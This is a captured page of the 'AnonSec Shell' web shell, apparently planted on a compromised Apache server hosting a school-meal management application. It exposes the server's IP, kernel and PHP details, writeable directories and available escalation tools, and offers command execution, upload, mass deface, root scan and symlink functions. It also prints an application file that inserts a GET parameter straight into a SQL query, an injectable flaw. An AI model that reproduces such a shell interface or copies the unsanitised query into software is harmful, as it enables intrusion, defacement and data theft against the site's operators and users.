AnonSec Shell
Server IP : 20.75.53.88  /  Your IP : 216.73.217.72   [ Reverse IP ]
Web Server : Apache
System : Linux VMRALP-3 4.4.0-256-generic #290~14.04.1-Ubuntu SMP Thu Jun 20 09:24:50 UTC 2024 x86_64
User : www-data ( 33)
PHP Version : 5.5.9-1ubuntu4.29+esm15
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,
Domains : 3 Domains
MySQL : ON  |  cURL : OFF  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /var/www/html/merenda/aratuba/modulos/movimento/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     [ BACKUP SHELL ]     [ JUMPING ]     [ MASS DEFACE ]     [ SCAN ROOT ]     [ SYMLINK ]     

Current File : /var/www/html/merenda/aratuba/modulos/movimento/ordcompraval_edt.php
<?php
    /**
     * Created by PhpStorm.
     * User: RalpAlves
     * Date: 12/01/2016
     * Time: 11:46
     */
    $cod     = $_GET['cod'];
    $rs_sql  = mysql_query("select * from ordemcompra_vlr where id_valor = $cod");
    $resulta = mysql_fetch_array($rs_sql);
?>
<head id="Head1">
</head>
<form id="form1" name="form1" id="cad_forn_edt" method="post" action="?page=./movimento/ordcompraval_crud&var_acao=editar">
    <div class="container">
        <div class="panel panel-info">
            <div class="panel-heading">
                <div class="panel-title">
                    <button type="submit" name="bt_novo" class="btn botao_esquerda" onClick="history.go(-1)" title="voltar"><i class="fa fa-arrow-left"></i></button>
                    <span style="font-size:20px;">&nbsp;Valor para controle de saldo | Edição</span>
                    <button type="submit" name="bt_novo" class="btn botao_direita" title="salvar"><i class="fa fa-check"></i></button>
                </div>
            </div>
        </div>
    </div>
    <div id="id_form" class="container">
        <br>

        <div class="col-xs-1">
            ID
            <input type="text" name="txt_id" size="20px" readonly="readonly" class="form-control" id="txt_id" value="<?=$resulta['id_valor']?>">
        </div>
        <div class="col-md-2">
            Mês
            <input type="text" name="txt_mes" readonly class="form-control" value="<?php echo $resulta['sigla'] ?>">
        </div>
        <div class="col-md-3">
            Valor
            <input type="text" name="txt_valor" autofocus class="form-control" onKeyup="formataValor(this,event);" value="<?php echo number_format($resulta['valor'], 2, ',', '.') ?>">
        </div>
    </div>
</form>
</html>

Anon7 - 2022
AnonSec Team